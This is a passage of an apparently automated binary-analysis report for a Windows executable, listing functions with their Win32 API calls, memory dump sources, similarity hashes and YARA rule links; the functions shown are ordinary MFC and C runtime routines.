                                      Download Yara Rule
                                      APIs
                                      • GetPropA.USER32 ref: 00442E24
                                      • CallWindowProcA.USER32 ref: 00442E49
                                        • Part of subcall function 004401E0: CallWindowProcA.USER32 ref: 00440206
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044021E
                                        • Part of subcall function 004401E0: RemovePropA.USER32 ref: 0044022A
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Prop$CallProcRemoveWindow
                                      • String ID:
                                      • API String ID: 2276450057-0
                                      • Opcode ID: 26c12af5cbcce08c49acb5eaa8d2ec29edb3b767065d90b127e6ed7a7b209029
                                      • Instruction ID: 62dcc1c6e14560c69844deece2871627b09cace6882289dd26f64c36300f9445
                                      • Opcode Fuzzy Hash: 26c12af5cbcce08c49acb5eaa8d2ec29edb3b767065d90b127e6ed7a7b209029
                                      • Instruction Fuzzy Hash: AD51DF76A04200AFE310DB44DC84DBBB7B8FBC9761F94452EF94483211E279AD4687A6
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00443170, Relevance: 16.6, APIs: 11, Instructions: 140windowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetWindowLongA.USER32 ref: 0044317E
                                      • GetClientRect.USER32 ref: 00443199
                                      • SendMessageA.USER32(?,00000031,00000000,00000000), ref: 004431CB
                                      • SelectObject.GDI32(?,00000000), ref: 004431D9
                                      • SetBkMode.GDI32(?,00000002), ref: 004431EA
                                      • GetParent.USER32(?), ref: 004431F8
                                      • SendMessageA.USER32(00000000), ref: 004431FF
                                      • SelectObject.GDI32(?,00000000), ref: 00443209
                                      • SelectObject.GDI32(?,00000000), ref: 0044322B
                                      • SelectObject.GDI32(?,00000000), ref: 0044323B
                                      • OffsetRect.USER32(?,000000FF,000000FF), ref: 00443292
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: ObjectSelect$MessageRectSend$ClientLongModeOffsetParentWindow
                                      • String ID:
                                      • API String ID: 3606012576-0
                                      • Opcode ID: 9ca012edca40cc47656dd8fc06b0c8be1d45db44b344155b869cda9e67462f87
                                      • Instruction ID: ad446790de35d434e0af4c2422187fd24a55ecb3cdc6ca9dba9bb86343039ce5
                                      • Opcode Fuzzy Hash: 9ca012edca40cc47656dd8fc06b0c8be1d45db44b344155b869cda9e67462f87
                                      • Instruction Fuzzy Hash: E84127722043017BE200AB44AC86F7F736CEB85F26F44056EF601961D3DAA9DA0587BA
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00447F34, Relevance: 15.9, APIs: 6, Strings: 3, Instructions: 175COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetSystemMetrics.USER32 ref: 00447FEB
                                      • GlobalLock.KERNEL32 ref: 00448075
                                      • CreateDialogIndirectParamA.USER32(?,?,BAADBEEF,00447D7C,00000000), ref: 004480A7
                                        • Part of subcall function 00447997: InterlockedDecrement.KERNEL32(-000000F4), ref: 004479AB
                                      • DestroyWindow.USER32(00000000,?,?,?,00000000,?,?), ref: 0044811E
                                      • GlobalUnlock.KERNEL32(?,?,?,?,00000000,?,?), ref: 0044812F
                                      • GlobalFree.KERNEL32 ref: 00448138
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Global$CreateDecrementDestroyDialogFreeIndirectInterlockedLockMetricsParamSystemUnlockWindow
                                      • String ID: Helv$MS Sans Serif$MS Shell Dlg
                                      • API String ID: 3135555545-2894235370
                                      • Opcode ID: 57dacada1aec1c99090df68a9bb2ff0484b26da2896eae2f356f5e9703eab259
                                      • Instruction ID: 87aad595b5a121b28f3993325f8e45f3d31caeefd3fcaa0a6ba6cf4df756c204
                                      • Opcode Fuzzy Hash: 57dacada1aec1c99090df68a9bb2ff0484b26da2896eae2f356f5e9703eab259
                                      • Instruction Fuzzy Hash: F861917190024ADFEF11EFA5C985AAEBBB1BF08305F10442FF505A6292DB788E45CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043B531, Relevance: 15.9, APIs: 8, Strings: 1, Instructions: 132COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B54C
                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B560
                                      • GetEnvironmentStringsW.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B58C
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000001,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00436861), ref: 0043B5C4
                                      • WideCharToMultiByte.KERNEL32(00000000,00000000,00000000,00000000,00000000,00000000,00000000,00000000,?,00000000,?,?,?,?,00436861), ref: 0043B5E6
                                      • FreeEnvironmentStringsW.KERNEL32(00000000,?,00000000,?,?,?,?,00436861), ref: 0043B5FF
                                      • GetEnvironmentStrings.KERNEL32(?,00000000,?,?,?,?,00436861), ref: 0043B612
                                      • FreeEnvironmentStringsA.KERNEL32(00000000), ref: 0043B650
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: EnvironmentStrings$ByteCharFreeMultiWide
                                      • String ID: ahC
                                      • API String ID: 1823725401-4104489344
                                      • Opcode ID: bb360231d674d0e1bf4e3719eb3839b36bdfb8dee904512e0a344f74551a7f9e
                                      • Instruction ID: 9ff38f4521bec964fcc555f15a7dcfeeefb0e4473b68ebd35830e80cafe83057
                                      • Opcode Fuzzy Hash: bb360231d674d0e1bf4e3719eb3839b36bdfb8dee904512e0a344f74551a7f9e
                                      • Instruction Fuzzy Hash: 123106B25042196FD7203F795C8663BB6DCE65D348F11243BF756C3212EB288C818AEE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0040164F, Relevance: 14.3, APIs: 6, Strings: 2, Instructions: 268COMMON
                                      Download Yara Rule
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID:
                                      • String ID: Arial$Free: %2.2f GB
                                      • API String ID: 0-1109879368
                                      • Opcode ID: e93f71a8e3d96e1550e10923e6b5e44f1a2279a71ff40c7964b2359e7ef2ec91
                                      • Instruction ID: eb13edb1482f8905054ef76cb265a41d331251cc77f0c514155ca40ad738ad96
                                      • Opcode Fuzzy Hash: e93f71a8e3d96e1550e10923e6b5e44f1a2279a71ff40c7964b2359e7ef2ec91
                                      • Instruction Fuzzy Hash: 70C1E870E002189FDB18DFA9C991BEDBBB5BF48344F10816EE50AB7291DB346A45CF58
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0042EA7A, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 121stringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStockObject.GDI32(00000011), ref: 0042EAB2
                                      • GetStockObject.GDI32(0000000D), ref: 0042EABD
                                      • GetObjectA.GDI32(00401D80,0000003C,?), ref: 0042EAEB
                                      • lstrlenA.KERNEL32(?), ref: 0042EB08
                                      • MultiByteToWideChar.KERNEL32(00000000,00000000,?,000000FF,?,00000001), ref: 0042EB2D
                                      • GetDeviceCaps.GDI32(?,0000005A), ref: 0042EB83
                                      • #253.OLEPRO32(00000020,004616E0,?,?,?,00000001), ref: 0042EBAF
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Object$Stock$#253ByteCapsCharDeviceMultiWidelstrlen
                                      • String ID:
                                      • API String ID: 2670341580-3916222277
                                      • Opcode ID: 06bda9e9e5254fd34e2a29672d3f64d9e2032c8ac9b40a4d4249f677ee1ccefc
                                      • Instruction ID: b838e9adac91e02d668c291edec9113ebba6c695fccc93279168a93a670aabcf
                                      • Opcode Fuzzy Hash: 06bda9e9e5254fd34e2a29672d3f64d9e2032c8ac9b40a4d4249f677ee1ccefc
                                      • Instruction Fuzzy Hash: 37418BB1D00219DFDB10DFA5C885AEEBBB8FF09304F60406AE905E3251E7789A49CB59
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00444A23, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 99COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetPropA.USER32 ref: 00444A40
                                      • CallWindowProcA.USER32 ref: 00444A9E
                                        • Part of subcall function 00444630: GetWindowRect.USER32 ref: 00444655
                                        • Part of subcall function 00444630: GetWindow.USER32(?,00000004), ref: 00444672
                                      • SetWindowLongA.USER32(?,000000FC,?), ref: 00444ACE
                                      • RemovePropA.USER32 ref: 00444AD6
                                      • GlobalFindAtomA.KERNEL32(AfxOldWndProc423), ref: 00444ADD
                                      • GlobalDeleteAtom.KERNEL32 ref: 00444AE4
                                        • Part of subcall function 0044460D: GetWindowRect.USER32 ref: 00444619
                                      • CallWindowProcA.USER32 ref: 00444B38
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Window$AtomCallGlobalProcPropRect$DeleteFindLongRemove
                                      • String ID: AfxOldWndProc423
                                      • API String ID: 3892049428-1060338832
                                      • Opcode ID: 27eb5d37a3354f064f67a128976f8cf3b178580ea3291a6ab167b8f4f0cce010
                                      • Instruction ID: 095ef9838afe754054dfd5f230bc47fa7256370d20334d7f5ea6544e98676d06
                                      • Opcode Fuzzy Hash: 27eb5d37a3354f064f67a128976f8cf3b178580ea3291a6ab167b8f4f0cce010
                                      • Instruction Fuzzy Hash: D331647280421ABBEF01AFA5DD4AFBF7A78EF85312F00051AF601A2151C73D8911D769
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00430D63, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 93COMMON
                                      Download Yara Rule
                                      APIs
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: __ftol$ModeRelease
                                      • String ID: W
                                      • API String ID: 1379597261-655174618
                                      • Opcode ID: fdfbb218934fee8eb8d5bf19f3f87fc033c2d47e1ce60b9ab3e2a1be5fbfc6ec
                                      • Instruction ID: c479fc4d92d1c216cd874968fff61004198bb838e688fa19c13d2defd09eb9c7
                                      • Opcode Fuzzy Hash: fdfbb218934fee8eb8d5bf19f3f87fc033c2d47e1ce60b9ab3e2a1be5fbfc6ec
                                      • Instruction Fuzzy Hash: FA413975A01209EFDB04CF98C599AEEBBB4FF48700F15859AE855AB3A1C734AE10CF54
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00449637, Relevance: 14.1, APIs: 7, Strings: 1, Instructions: 58COMMON
                                      Download Yara Rule
                                      APIs
                                      • GetStockObject.GDI32(00000011), ref: 00449653
                                      • GetStockObject.GDI32(0000000D), ref: 0044965B
                                      • GetObjectA.GDI32(00000000,0000003C,?), ref: 00449668
                                      • GetDC.USER32(00000000), ref: 00449677
                                      • GetDeviceCaps.GDI32(00000000,0000005A), ref: 0044968E
                                      • MulDiv.KERNEL32(?,00000048,00000000), ref: 0044969A
                                      • ReleaseDC.USER32 ref: 004496A5
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Object$Stock$CapsDeviceRelease
                                      • String ID: System
                                      • API String ID: 46613423-3470857405
                                      • Opcode ID: 048eb01dacaee6c820a4bd091a3975f33037570a772f28067e8f93139cf52a6b
                                      • Instruction ID: 5b6766bc19c29aa3f8f7e03f7974bbf6190a8cbd55d6f122b8dc0202f2e2110d
                                      • Opcode Fuzzy Hash: 048eb01dacaee6c820a4bd091a3975f33037570a772f28067e8f93139cf52a6b
                                      • Instruction Fuzzy Hash: 7E117031A40318EFFB109BA1DD45FAF3B68AB05B52F004026FA05E62D1D7749D419BA8
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00446B5E, Relevance: 14.0, APIs: 6, Strings: 2, Instructions: 42libraryloaderCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleHandleA.KERNEL32(COMCTL32.DLL,00000800,00000000,00000400,00446E58,00000000,00020000,?,?,00000000), ref: 00446B67
                                      • LoadLibraryA.KERNEL32(COMCTL32.DLL,?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446B70
                                      • GetProcAddress.KERNEL32(00000000,InitCommonControlsEx), ref: 00446B84
                                      • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446B9F
                                      • #17.COMCTL32(?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446BBB
                                      • FreeLibrary.KERNEL32(00000000,?,00000000,?,?,?,?,?,?,?,?,00447F7C,00000010,00000000), ref: 00446BC7
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: Library$AddressFreeHandleLoadModuleProc
                                      • String ID: COMCTL32.DLL$InitCommonControlsEx
                                      • API String ID: 1437655972-4218389149
                                      • Opcode ID: fac53153985d7d767b38765a7a81842b62a20c8ce16e154e7758a4d868a3114e
                                      • Instruction ID: 19351325aef1320d6205d7a63ba929c021b82d7ab829336d3b2ef766ad711604
                                      • Opcode Fuzzy Hash: fac53153985d7d767b38765a7a81842b62a20c8ce16e154e7758a4d868a3114e
                                      • Instruction Fuzzy Hash: 0FF0F932700B629757115F64DD48E4B72ACEB85752706043AF910D3221DB28DC08877B
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043BBFA, Relevance: 13.7, APIs: 9, Instructions: 177COMMON
                                      Download Yara Rule
                                      APIs
                                      • LCMapStringW.KERNEL32(00000000,00000100,004614D0,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BC3C
                                      • LCMapStringA.KERNEL32(00000000,00000100,004614CC,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BC58
                                      • LCMapStringA.KERNEL32(?,00000100,00000020,00000001,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BCA1
                                      • MultiByteToWideChar.KERNEL32(00000000,00000101,00000020,00000001,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?,00000000), ref: 0043BCD9
                                      • MultiByteToWideChar.KERNEL32(00000000,00000001,00000020,00000001,00000100,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BD31
                                      • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BD47
                                      • LCMapStringW.KERNEL32(?,00000100,00000100,00000000,00000000,00000100,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BD7A
                                      • LCMapStringW.KERNEL32(?,00000100,00000100,00000100,?,00000000,?,00000100,00000000,00000100,00000000,00000001,00000020,00000100,?), ref: 0043BDE2
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: String$ByteCharMultiWide
                                      • String ID:
                                      • API String ID: 352835431-0
                                      • Opcode ID: b9b74135c75423a479d6b220c4b431ed190c34f9baef5eb670389bea63384aac
                                      • Instruction ID: eec907906d50117275dc50c3fb9d9b90c0af71b2f8900a2442081d6721ac0081
                                      • Opcode Fuzzy Hash: b9b74135c75423a479d6b220c4b431ed190c34f9baef5eb670389bea63384aac
                                      • Instruction Fuzzy Hash: 78516931900209ABCF228F95CC45BEF7BB5FF4D751F24512AFA14A2260D33A8C51DBA9
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00441800, Relevance: 13.6, APIs: 9, Instructions: 128threadwindowCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetCurrentThreadId.KERNEL32 ref: 00441807
                                      • EnterCriticalSection.KERNEL32(00472D20), ref: 00441814
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044185C
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 00441873
                                      • LeaveCriticalSection.KERNEL32(00472D20), ref: 0044188E
                                      • GetWindowLongA.USER32 ref: 004418D2
                                      • SendMessageA.USER32(?,000011F0,00000000,00000001), ref: 004418F9
                                      • GetParent.USER32(?), ref: 00441961
                                      • CallNextHookEx.USER32(00000000,?,?,?), ref: 0044199E
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: CriticalSection$CallHookLeaveNext$CurrentEnterLongMessageParentSendThreadWindow
                                      • String ID:
                                      • API String ID: 1151315845-0
                                      • Opcode ID: 6e13959d56a97a165b7de9cabc345e5dffd73404d52c3e51afe23d1641b7a4eb
                                      • Instruction ID: 005850604defb740b874adb7d8ce02af1d58c8bb670bd6602af5c3a9fcccf914
                                      • Opcode Fuzzy Hash: 6e13959d56a97a165b7de9cabc345e5dffd73404d52c3e51afe23d1641b7a4eb
                                      • Instruction Fuzzy Hash: AD41C3759003059BF720EF14ED45BAB77A8EB44355F00452AF94993272D7B8EC88CBAE
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 0043B939, Relevance: 12.4, APIs: 3, Strings: 4, Instructions: 100fileCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GetModuleFileNameA.KERNEL32(00000000,?,00000104,?), ref: 0043B9A6
                                      • GetStdHandle.KERNEL32(000000F4,00461440,00000000,?,00000000,?), ref: 0043BA7C
                                      • WriteFile.KERNEL32(00000000), ref: 0043BA83
                                      Strings
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                      • Associated: 00000000.00000002.329629902.0000000000400000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329749722.0000000000451000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329764896.0000000000456000.00000040.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329781612.000000000045F000.00000002.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329798644.0000000000468000.00000008.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329810430.000000000046D000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329822386.0000000000471000.00000004.00020000.sdmp Download File
                                      • Associated: 00000000.00000002.329833561.0000000000474000.00000008.00020000.sdmp Download File
                                      Similarity
                                      • API ID: File$HandleModuleNameWrite
                                      • String ID: ...$<program name unknown>$Microsoft Visual C++ Runtime Library$Runtime Error!Program:
                                      • API String ID: 3784150691-4022980321
                                      • Opcode ID: 24858ae332a1a1c21fd3a99df7b967cd8801d8f0f5c634ef2bb48ee14ab40898
                                      • Instruction ID: 2c0d377a22f8810cc1508e173b3de119adb786e16eb1a8b9c870dce98b567ff5
                                      • Opcode Fuzzy Hash: 24858ae332a1a1c21fd3a99df7b967cd8801d8f0f5c634ef2bb48ee14ab40898
                                      • Instruction Fuzzy Hash: 9E310A72A002186FDF20EA61DC46F9A77ACEF49304F14145BF645E7190F778E9418B9A
                                      Uniqueness

                                      Uniqueness Score: -1.00%

                                      Function 00448752, Relevance: 12.1, APIs: 8, Instructions: 65memorystringCOMMON
                                      Download Yara Rule
                                      APIs
                                      • GlobalLock.KERNEL32 ref: 00448772
                                      • lstrcmpA.KERNEL32(?,?), ref: 0044877E
                                      • OpenPrinterA.WINSPOOL.DRV(?,?,00000000), ref: 00448790
                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004487B3
                                      • GlobalAlloc.KERNEL32(00000042,00000000,00000000,?,?,00000000,00000000,00000000,?,?,00000000), ref: 004487BB
                                      • GlobalLock.KERNEL32 ref: 004487C8
                                      • DocumentPropertiesA.WINSPOOL.DRV(00000000,?,?,00000000,00000000,00000002), ref: 004487D5
                                      • ClosePrinter.WINSPOOL.DRV(?,00000000,?,?,00000000,00000000,00000002), ref: 004487F3
                                        • Part of subcall function 0044AE07: GlobalFlags.KERNEL32(?), ref: 0044AE11
                                        • Part of subcall function 0044AE07: GlobalUnlock.KERNEL32(?,?,?,0044C95C,?,?,?,?,00420FAF,0046F4E0,?,00411BFB), ref: 0044AE28
                                        • Part of subcall function 0044AE07: GlobalFree.KERNEL32 ref: 0044AE33
                                      Memory Dump Source
                                      • Source File: 00000000.00000002.329634910.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
